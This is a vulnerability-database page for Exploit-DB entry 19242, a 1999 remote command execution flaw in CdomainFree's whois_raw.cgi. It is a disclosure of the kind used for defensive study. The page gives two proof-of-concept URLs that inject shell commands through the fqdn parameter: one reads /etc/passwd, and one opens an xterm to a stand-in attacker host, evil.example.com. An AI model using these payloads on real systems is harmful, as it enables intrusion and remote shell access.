Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbSalvatore Sanfilippo -antirez-EDB-ID:19242
HistoryJun 01, 1999 - 12:00 a.m.

CdomainFree 2.4 - Remote Command Execution

1999-06-0100:00:00
Salvatore Sanfilippo -antirez-
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/304/info

A vulnerability in a CGI program part of CdomainFree allows remote malicious users to run any executable already existing to the machine.

The vulnerability is in the whois_raw.cgi program. This CGI passes user input to the shell without proper filtering. None of the Cdomain commercial version (e.g. CdomainPro) are vulnerable as they connect the the whois servers directly. 

http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
http://www.example.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20evil.example.com:0

Related

cvelist 1
nvd 1
cve 1
nessus 1
cvelist
cvelist
CVE-1999-1063
2001-09-12 04:00:00
nvd
nvd
CVE-1999-1063
1999-06-01 04:00:00
cve
cve
CVE-1999-1063
2001-09-12 04:00:00
nessus
nessus
CDomain whois_raw.cgi fqdn Parameter Arbitrary Command Execution
1999-06-22 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:19242
cvelist1nvd1cve1nessus1